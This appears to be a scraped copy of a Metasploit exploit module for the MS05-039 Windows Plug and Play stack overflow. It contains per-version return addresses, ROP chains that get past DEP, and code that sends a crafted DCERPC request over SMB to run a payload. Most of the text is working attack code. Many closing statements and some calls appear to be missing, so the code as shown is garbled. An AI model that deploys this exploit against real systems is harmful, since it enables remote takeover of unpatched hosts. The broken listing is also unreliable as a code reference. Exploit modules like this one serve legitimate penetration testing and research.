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20 mins
Test Coverage
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  def initialize(info = {})
      'Name'           => 'MS05-039 Microsoft Plug and Play Service Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the Windows Plug
        and Play service. This vulnerability can be exploited on
        Windows 2000 without a valid user account.

        NOTE: Since the PnP service runs inside the service.exe process, a failed
        exploit attempt will cause the system to automatically reboot.
      'Author'         => [ 'hdm', 'cazz' ],
      'License'        => MSF_LICENSE,
      'References'     =>
          [ 'CVE', '2005-1983' ],
          [ 'OSVDB', '18605' ],
          [ 'BID', '14513' ],
          [ 'MSB', 'MS05-039' ]
      'DefaultOptions' =>
          'EXITFUNC' => 'thread',
      'Privileged'     => true,
      'Payload'        =>
          'Space'    => 1000,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
      'Platform'       => 'win',
      'Targets'        =>
            'Windows 2000 SP0-SP4', # Tested OK - 11/25/2005 hdm
              'Ret'      => 0x767a38f6, # umpnpmgr.dll
            'Windows 2000 SP4 French',
              'Ret'      => 0x767438f6, # French target by ExaProbe <fmourron@exaprobe.com>
            'Windows 2000 SP4 Spanish',
              'Ret'      => 0x767738f6, # umpnpmgr.dll
            # Tested on: English/French/German/Dutch/Finnish/Greek/Polish/Portuguese/Hungarian/Korean/Chinese/Arabic/Turkish/Russian
            'Windows 2000 SP4 Universal',
              'Ret'      => 0x01013C79, # [Pita] [Houmous] <pita@mail.com>
            'Windows 2000 SP0-SP4 German',
              'Ret'      => 0x767338f6, # German target by Michael Thumann <mthumann@ernw.de>
            'Windows 2000 SP0-SP4 Italian',
              'Ret'      => 0x7677366f, # acaro <acaro@jervus.it>
            'Windows XP SP1 English',
              'Ret'      => 0x758c572a, # pop edi / pop ebx / ret in umpnpmgr.dll v5.1.2600.1106
              'Pipe'     => 'ntsvcs',
              'Offset'   => 16,
          # NOTE: XP SP2, Server 2003 (and SP1) require an Administrator account to access
          # the vulnerable functionality.
            'Windows XP SP2 English (Requires Admin)',
            # SafeSEH enabled, DEP AlwaysOn
              #'Ret'       => 0x41424344,
              'Ret'       => 0x758d2bb3,  # pop eax / ret 0x8
              'Pipe'      => 'ntsvcs',
              'PtrToZero' => 0x758c0170,  # PE data of umpnpmgr.dll v5.1.2600.2180
              'Offset'    => 72,
              'EspOffset' => 108,
              'RopStack'  =>
                # All addresses are from umpnpmgr.dll v5.2.3790.1830
                  # Step 1. Allocate an executable heap with HeapCreate
                  # Resolve HeapCreate from import
                  0x758c1148,            # pointer to HeapCreate import
                  0x758c2950,            # mov eax, [eax] / pop ebp / ret 0x8
                  0x41414141,            # scratch
                  0x41414141,            # scratch
                  #0x758da008,            # becomes ebp (something writable)
                  0x758da1c8-0xc,        # becomes ebp (writable, used later)

                  # Call HeapCreate
                  0x758cb728,            # call eax / mov [ebp+0xc],eax / jmp... / mov eax,[ebp+0xc] / pop edi,esi,ebx,ebp / ret 0xc
                  0x41414141,            # scratch
                  0x41414141,            # scratch
                  0x01040110,            # flOptions (gets & with 0x40005)
                  0x758ce552,            # becomes edi - pop edi,esi / ret
                  0x758cdd7e,            # becomes esi - pop esi,ebx,ebp / ret 0x4
                  0x41414141,            # becomes ebx
                  0x41414141,            # becomes ebp

                  # Don't bother calling HeapAlloc, just add 0x8000 to the Heap Base
                  0x758d45f3,            # or eax,0x8000 / pop ebp / ret 0x4
                  0x41414141,            # scratch
                  0x41414141,            # scratch
                  0x41414141,            # scratch
                  0x41414141,            # becomes ebp

                  # save eax to ebx
                  0x758ce0d5,            # push eax / call esi
                  0x41414141,            # scratch
                  0x758da008+0x18,       # becomes ebp

                  # Setup eax to load our saved stack pointer
                  0x758d18db,            # pop eax / ret 0xc
                  0x41414141,            # scratch
                  0x758c524e,            # becomes eax - pop ebp / ret 0x8
                  #0x758c2423,            # becomes eax - pop esi,ebp / ret 0x8

                  # Store a pointer to the stack to a known address (ebp-0x18), flows to eax after
                  0x758c1281,            # mov [ebp-0x18],esp / push eax / mov eax,[ebp-4] / mov [ebp-4],0xffffffff / mov [ebp-8],eax / lea eax,[ebp-0x10] / mov fs:[0],eax / ret
                  0x41414141,            # scratch
                  0x41414141,            # scratch
                  0x41414141,            # scratch
                  #0xcafebabe,            # becomes esi
                  0x758da008-0x10,       # becomes ebp

                  # Call lstrcpyW to copy shellcode into executable heap
                  0x758c542e,            # push [ebp+0x10] / push ebx / call lstrcpyW / push ebx / call edi
                  0x41414141,            # scratch
                  0x41414141,            # scratch

                  # Skip the junk
                  0x758c96f6,            # add al,0x3b / ret

                  # Call the executable segment!
                  0x758c3b62             # call eax
            'Windows Server 2003 SP0 English (Requires Admin)',
            # SafeSEH unsupported, DEP unsupported
              'Ret'       => 0x780df756, # push esp / ret in msvcp60.dll
              'Pipe'      => 'ntsvcs',
              'PtrToZero' => 0x757702c0, # PE data of umpnpmgr.dll
              'Offset'    => 72,
            'Windows Server 2003 SP1 English (Requires Admin)',
            # SafeSEH enabled, DEP AlwaysOn
              'Pipe'      => 'ntsvcs',
              # We will need to bypass DEP!
              #'Ret'       => 0x41424344,
              'Ret'       => 0x757873d5,  # pop eax / ret 0x4
              'PtrToZero' => 0x757702c0,  # PE data of umpnpmgr.dll
              'Offset'    => 72,          # offset to saved eip
              'EspOffset' => 108,         # Offset to where esp ends up pointing
              'RopStack'  =>              # NOTE: 0x41414141 will become random data
                # All addresses are from umpnpmgr.dll v5.2.3790.1830
                  # Step 1. Allocate an executable heap with HeapCreate
                  # Resolve HeapCreate from import
                  0x75771144,            # pointer to HeapCreate import
                  0x75772e68,            # mov eax, [eax] / pop ebp / ret
                  0x41414141,            # scratch
                  0x41414141,            # becomes ebp
                  # Call HeapCreate
                  0x7578bc37,            # jmp eax
                  0x41414141,            # scratch
                  0x41414141,            # scratch
                  # Save the new heap address in edi
                  0x757791d5,            # xchg eax,edi / cmp bh,0xff / ret 0x10
                  0x01040110,            # flOptions (gets & with 0x40005)

                  # Step 2. Allocate a buffer using this new heap.
                  0x757873d5,            # pop eax / ret 0x4
                  0x41414141,            # scratch
                  0x41414141,            # scratch
                  0x41414141,            # scratch
                  0x41414141,            # scratch
                  # Resolve HeapAlloc from import
                  0x7577115c,            # pointer to HeapAlloc import
                  0x75772e68,            # mov eax, [eax] / pop ebp / ret
                  0x41414141,            # scratch
                  0x41414141,            # becomes ebp
                  # Save the address of HeapAlloc in esi
                  0x75777ae0,            # xchg eax,esi / mov dl,0xff / dec ecx / ret
                  0x41414141,            # scratch
                  0x41414141,            # scratch
                  # Call HeapAlloc
                  0x7578bb6b,            # push edi / call esi / pop edi,esi,ebp / ret
                  0xffffffff,            # flags
                  0x00010001,            # allocation size
                  0x0101018d,            # becomes edi / first byte stored
                  0x7577835c,            # becomes esi - pop esi / pop ebx / ret
                  0x757830c3,            # becomes ebp/eip - pop esi / ret

                  # Step 3. Save the heap address into ebx
                  0x7578308f,            # push eax / mov [0x7578d8e0],edi / mov [0x7578d39c],edi / call esi
                  0x41414141,            # scratch
                  # Put heap address in edi
                  0x757791d5,            # xchg eax,edi / cmp bh,0xff / ret 0x10

                  # Step 4. Write stub:
                  # metasm > lea esi,[esp+4]; _start: lodsb; test al,al; jz _out; stosb; _end: jmp _start; _out:
                  # "\x8d\x74\x24\x04\xac\x84\xc0\x74\x03\xaa\xeb\xf8"
                  # Store the first byte.
                  0x7578be14,            # stosb / ret
                  0x41414141,            # scratch
                  0x41414141,            # scratch
                  0x41414141,            # scratch
                  0x41414141,            # scratch
                  # Store another byte!
                  0x757873d5,            # pop eax / ret 0x4
                  0x01010174,            # next byte to write
                  0x7578be14,            # stosb / ret
                  0x41414141,            # scratch
                  # Store another byte!
                  0x757873d5,            # pop eax / ret 0x4
                  0x01010124,            # next byte to write
                  0x7578be14,            # stosb / ret
                  0x41414141,            # scratch
                  # Store another byte!
                  0x757873d5,            # pop eax / ret 0x4
                  0x01010104,            # next byte to write
                  0x7578be14,            # stosb / ret
                  0x41414141,            # scratch
                  # Store another byte!
                  0x757873d5,            # pop eax / ret 0x4
                  0x010101ac,            # next byte to write
                  0x7578be14,            # stosb / ret
                  0x41414141,            # scratch
                  # Store another byte!
                  0x757873d5,            # pop eax / ret 0x4
                  0x01010184,            # next byte to write
                  0x7578be14,            # stosb / ret
                  0x41414141,            # scratch
                  # Store another byte!
                  0x757873d5,            # pop eax / ret 0x4
                  0x010101c0,            # next byte to write
                  0x7578be14,            # stosb / ret
                  0x41414141,            # scratch
                  # Store another byte!
                  0x757873d5,            # pop eax / ret 0x4
                  0x01010174,            # next byte to write
                  0x7578be14,            # stosb / ret
                  0x41414141,            # scratch
                  # Store another byte!
                  0x757873d5,            # pop eax / ret 0x4
                  0x01010103,            # next byte to write
                  0x7578be14,            # stosb / ret
                  0x41414141,            # scratch
                  # Store another byte!
                  0x757873d5,            # pop eax / ret 0x4
                  0x010101aa,            # next byte to write
                  0x7578be14,            # stosb / ret
                  0x41414141,            # scratch
                  # Store another byte!
                  0x757873d5,            # pop eax / ret 0x4
                  0x010101eb,            # next byte to write
                  0x7578be14,            # stosb / ret
                  0x41414141,            # scratch
                  # Store another byte!
                  0x757873d5,            # pop eax / ret 0x4
                  0x010101f8,            # next byte to write
                  0x7578be14,            # stosb / ret
                  0x41414141,            # scratch

                  # Step 5. Finally, call our executable heap buffer.
                  0x75783efe             # call ebx
      'DefaultTarget' => 0,
      'DisclosureDate' => '2005-08-09'))

        OptString.new('SMBPIPE', [ true,  "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']),


  def pnp_probe(req, pipe = datastore['SMBPIPE'])

    print_status("Connecting to the SMB service...")
    rescue ::Exception => e
      print_error("Error: #{e.class} #{e}")

    handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{pipe}"])
    print_status("Binding to #{handle} ...")
    print_status("Bound to #{handle} ...")

    # CS_DES
    cs_des =
      NDR.long(0) + # CSD_SignatureLength
      NDR.long(0) + # CSD_LegacyDataOffset
      NDR.long(req.length) + # CSD_LegacyDataSize
      NDR.long(0) + # CSD_Flags
      rand_text(16) + # GUID
      req # CSD_LegacyData

    # PNP_QueryResConfList(L"a\\b\\c", 0xffff, (char *)pClassResource, 1000, foo, 4, 0);

    # ResourceName:
    stubdata =
      NDR.UnicodeConformantVaryingString("a\\b\\c") +  # ResourceName, passes both IsLegalDeviceId and IsRootDeviceID
      NDR.long(0xffff) +                               # ResourceID: ResType_ClassSpecific
      NDR.UniConformantArray(cs_des) +                 # Resource (our CS_DES structure)
      NDR.long(cs_des.length) +                        # ResourceLen
      NDR.long(4) +                                    # OutputLen (at least 4)
      NDR.long(0)                                      # Flags

    print_status("Calling the vulnerable function...")

      dcerpc.call(0x36, stubdata)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      print_status('Server did not respond, this is expected')
    rescue => e
      if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
        print_status('Server disconnected, this is expected')
        raise e

    # Cleanup

    if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil and
        dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
      return true
      return false

  def check
    if (pnp_probe('A'))
      return Exploit::CheckCode::Vulnerable
    return Exploit::CheckCode::Safe

  def exploit
    # If PtrToZero is set, we use saved-ret-overwrite instead of SEH.
    if target['PtrToZero'] then
      eip_off = target['Offset']
      nul_off = eip_off + 8

      # DEP Bypass version (2003 SP1)
      if target['RopStack']
        esp_off = target['EspOffset']

        # Start with a randomized base buffer
        rop_length = target['RopStack'].length * 4
        print_status("ROP Data is %u bytes" % rop_length)
        buf = rand_text(esp_off + rop_length)

        # Put the rest of the stack data at where esp ends up...
        target['RopStack'].each_with_index { |el,idx|
          if el != 0x41414141
            buf[esp_off + (idx*4), 4] = [el].pack('V')
        # Start with a randomized base buffer
        buf = rand_text(nul_off)

      # This becomes EIP
      buf[eip_off,4] = [target.ret].pack('V')

      # Pointer to NULL (4 zero bytes)
      buf[nul_off,4] = [target['PtrToZero']].pack('V')
      # Pad the string up to reach our SEH frame
      buf = rand_text(target['Offset'] ? target['Offset'] : 56)

      # Jump over the address and our invalid pointer to the payload
      buf << Rex::Arch::X86.jmp_short('$+32')
      buf << rand_text(2)

      # The SEH handler pointer
      buf << [target.ret].pack('V')

      # Some padding to reach the next pointer
      buf << rand_text(20)

      # ResourceName - cause access violation on RtlInitUnicodeString
      buf << rand_text(3) + "\xff"

    # Append the encoded payload and we are good to go!
    buf << payload.encoded

    # Determine which pipe to use
    pipe = target['Pipe'] ? target['Pipe'] :  datastore['SMBPIPE']

    pnp_probe(buf, pipe)

    print_status('The server should have executed our payload')
